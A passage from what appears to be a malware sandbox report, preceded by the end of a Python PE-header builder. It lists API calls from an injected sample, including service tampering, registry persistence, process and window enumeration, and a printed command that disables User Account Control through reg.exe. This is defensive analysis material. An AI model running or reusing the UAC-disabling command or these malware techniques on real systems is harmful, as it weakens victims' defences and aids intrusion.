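    return bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + bytes(opt)


if __name__ == "__main__":
    info = validate_pe(build_minimal_pe32())
    print(f"alloc 0x{info.alloc_size:X} bytes for SizeOfImage 0x{info.size_of_image:X}")
    print(f"x64 image on x86 host -> 0x{loader_status(build_minimal_pe32(IMAGE_FILE_MACHINE_AMD64)):X}")
```

The machine check is why the dump's loader calls GetNativeSystemInfo before allocating: a PE32 loader running in a 32-bit process must refuse an AMD64 image rather than map it, and the 0xC1 it sets is the same code the Windows loader uses for the same condition.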
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                • Opcode Fuzzy Hash: a5d3cace08fe2293b93f252f036f94aa86e711d29a6ca0b520457e27db828097
                                                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID:
                                                                                                • API String ID: 493672254-0
                                                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • _free.LIBCMT ref: 004482CC
                                                                                                • _free.LIBCMT ref: 004482F4
                                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • _abort.LIBCMT ref: 00448313
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: @^E
                                                                                                • API String ID: 269201875-2908066071
                                                                                                • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                                • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                                APIs
                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                • String ID: 0$MsgWindowClass
                                                                                                • API String ID: 2877667751-2410386613
                                                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                Strings
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                • API String ID: 2922976086-4183131282
                                                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,RG), ref: 0041385A
                                                                                                • RegSetValueExW.ADVAPI32(RG,?,00000000,00000001,00000000,00000000,00475300,?,0040F85E,pth_unenc,004752E8), ref: 00413888
                                                                                                • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,004752E8), ref: 00413893
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc$RG
                                                                                                • API String ID: 1818849710-3487042679
                                                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                • String ID: KeepAlive | Disabled
                                                                                                • API String ID: 2993684571-305739064
                                                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
APIs
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
• Sleep.KERNEL32(00002710), ref: 0041AE98
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
• CloseHandle.KERNEL32(00000000), ref: 0040FB40
  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• API String ID: 4269425633-0
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
• __alloca_probe_16.LIBCMT ref: 00451231
• MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
• __freea.LIBCMT ref: 0045129D
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• API String ID: 313313983-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
• _free.LIBCMT ref: 0044F43F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
• _free.LIBCMT ref: 00448353
• _free.LIBCMT ref: 0044837A
• SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
• SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ErrorLast$_free
• API String ID: 3170660625-0
APIs
• _free.LIBCMT ref: 00450A54
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00450A66
• _free.LIBCMT ref: 00450A78
• _free.LIBCMT ref: 00450A8A
• _free.LIBCMT ref: 00450A9C
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00444106
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00444118
• _free.LIBCMT ref: 0044412B
• _free.LIBCMT ref: 0044413C
• _free.LIBCMT ref: 0044414D
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
• GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
• IsWindowVisible.USER32(?), ref: 00417677
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (VG
• API String ID: 3142014140-3443974315
                                                                                                APIs
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: [regsplt]
                                                                                                • API String ID: 3554306468-4262303796
                                                                                                • Opcode ID: de06cbc2e6884f3056975f6b9d13e2a90977426a4895cc59e20832565893715a
                                                                                                • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                • Opcode Fuzzy Hash: de06cbc2e6884f3056975f6b9d13e2a90977426a4895cc59e20832565893715a
                                                                                                • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443515
                                                                                                • _free.LIBCMT ref: 004435E0
                                                                                                • _free.LIBCMT ref: 004435EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
